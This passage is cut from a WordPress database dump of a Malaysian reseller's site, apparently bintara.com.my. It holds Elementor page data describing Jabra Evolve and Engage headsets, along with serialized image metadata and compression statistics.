65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 SE<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"caaab5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\",\"id\":2867},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(5086,2868,'_elementor_edit_mode','builder'),(5085,2868,'_wp_page_template','template-fullwidth.php'),(5083,2867,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.7941863318635551394208960118703544139862060546875;s:5:\"bytes\";i:16162;s:11:\"size_before\";i:126323;s:10:\"size_after\";i:110161;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:1845;s:11:\"size_before\";i:9928;s:10:\"size_after\";i:8083;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:3569;s:11:\"size_before\";i:27921;s:10:\"size_after\";i:24352;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.75;s:5:\"bytes\";i:1020;s:11:\"size_before\";i:15101;s:10:\"size_after\";i:14081;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3861;s:11:\"size_before\";i:31742;s:10:\"size_after\";i:27881;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:5867;s:11:\"size_before\";i:41631;s:10:\"size_after\";i:35764;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(5098,2870,'_wp_attached_file','2019/02/Engage_50_3.png'),(5099,2870,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:627;s:4:\"file\";s:23:\"2019/02/Engage_50_3.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Engage_50_3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Engage_50_3-263x300.png\";s:5:\"width\";i:263;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Engage_50_3-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Engage_50_3-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Engage_50_3-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Engage_50_3-18x20.png\";s:5:\"width\";i:18;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5089,2868,'_elementor_version','0.4'),(5102,2871,'_wp_page_template','template-fullwidth.php'),(5103,2871,'_elementor_edit_mode','builder'),(5104,2871,'_elementor_template_type','post'),(5105,2871,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 SE<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"caaab5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\",\"id\":2867},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f301c92\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\",\"id\":2870},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Jabra Engage 50<\\/h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5100,2870,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.83337608836711041249145637266337871551513671875;s:5:\"bytes\";i:23636;s:11:\"size_before\";i:132538;s:10:\"size_after\";i:108902;s:4:\"time\";d:0.5;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1859;s:11:\"size_before\";i:9027;s:10:\"size_after\";i:7168;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:3734;s:11:\"size_before\";i:25265;s:10:\"size_after\";i:21531;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2244;s:11:\"size_before\";i:16309;s:10:\"size_after\";i:14065;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2901;s:11:\"size_before\";i:37012;s:10:\"size_after\";i:34111;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:12898;s:11:\"size_before\";i:44925;s:10:\"size_after\";i:32027;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(5106,2871,'_elementor_version','0.4'),(6143,3048,'_wp_attached_file','2019/03/Zoom-Conference-Room-Solutions_page2_image7.jpg'),(5146,2881,'_wp_page_template','template-fullwidth.php'),(5147,2881,'_elementor_edit_mode','builder'),(5148,2881,'_elementor_template_type','post'),(5149,2881,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p><strong>[maxbutton 